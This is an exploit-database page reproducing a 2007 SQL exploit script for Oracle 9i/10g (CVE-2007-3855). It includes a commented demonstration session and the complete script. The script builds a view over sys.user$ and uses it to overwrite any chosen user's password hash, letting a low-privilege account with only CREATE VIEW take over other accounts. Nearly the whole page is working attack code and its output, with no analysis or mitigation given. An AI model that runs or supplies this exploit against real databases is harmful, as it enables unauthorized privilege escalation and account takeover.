header-logo
Suggest Exploit
vendor:
Unknown
by:
Andrea "bunker" Purificato
N/A
CVSS
N/A
evil view exploit
Unknown
CWE
Product Name: Unknown
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE-2007-3855
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

bunkerview.sql

Uses evil view to perform unauthorized password update

Mitigation:

Unknown
Source

Exploit-DB raw data:

--
-- bunkerview.sql 
--
-- Oracle 9i/10g - evil view exploit (CVE-2007-3855)
-- Uses evil view to perform unauthorized password update
--
-- by Andrea "bunker" Purificato - http://rawlab.mindcreations.com
-- 37F1 A7A1 BB94 89DB A920  3105 9F74 7349 AF4C BFA2
--
-- This code should be used only for LEGAL purpose!
-- ...and remember: use Oracle at your own risk ;-)
--
-- Thanks to security researchers all around the world...
-- Smarties rules (they know what I mean)! ;-D
--
--
-- SQL> select * from user_sys_privs;
-- 
-- USERNAME                       PRIVILEGE                                ADM
-- ------------------------------ ---------------------------------------- ---
-- TEST                           CREATE VIEW                              NO
-- TEST                           CREATE SESSION                           NO
--
-- SQL> select password from sys.user$ where name='TEST';
--
-- PASSWORD
-- ------------------------------
-- AAAAAAAAAAAAAAAA
-- 
-- SQL> @bunkerview
-- [+] bunkerview.sql - Evil view exploit for Oracle 9i/10g (CVE-2007-3855)
-- [+] by Andrea "bunker" Purificato - http://rawlab.mindcreations.com
-- [+] 37F1 A7A1 BB94 89DB A920  3105 9F74 7349 AF4C BFA2
-- 
-- Target username (default TEST):
-- 
-- View created.
-- 
-- old   1:   update bunkerview set password='6D9FEAAB597EF01B' where name='&the_user'
-- new   1:   update bunkerview set password='6D9FEAAB597EF01B' where name='TEST'
-- 
-- 1 row updated.
-- 
-- 
-- View dropped.
-- 
-- 
-- Commit complete.
-- 
-- SQL> select password from sys.user$ where name='TEST';
-- 
-- PASSWORD
-- ------------------------------
-- 6D9FEAAB597EF01B
--
set serveroutput on;
prompt [+] bunkerview.sql - Evil view exploit for Oracle 9i/10g (CVE-2007-3855)
prompt [+] by Andrea "bunker" Purificato - http://rawlab.mindcreations.com
prompt [+] 37F1 A7A1 BB94 89DB A920  3105 9F74 7349 AF4C BFA2
prompt 
undefine the_user;
accept the_user char prompt 'Target username (default TEST): ' default 'TEST';
create or replace view bunkerview as 
  select x.name,x.password from sys.user$ x left outer join sys.user$ y on x.name=y.name;
  update bunkerview set password='6D9FEAAB597EF01B' where name='&the_user';
  drop view bunkerview;
commit;

-- milw0rm.com [2007-07-19]

Navigation

Suggest Exploit

Services By CQR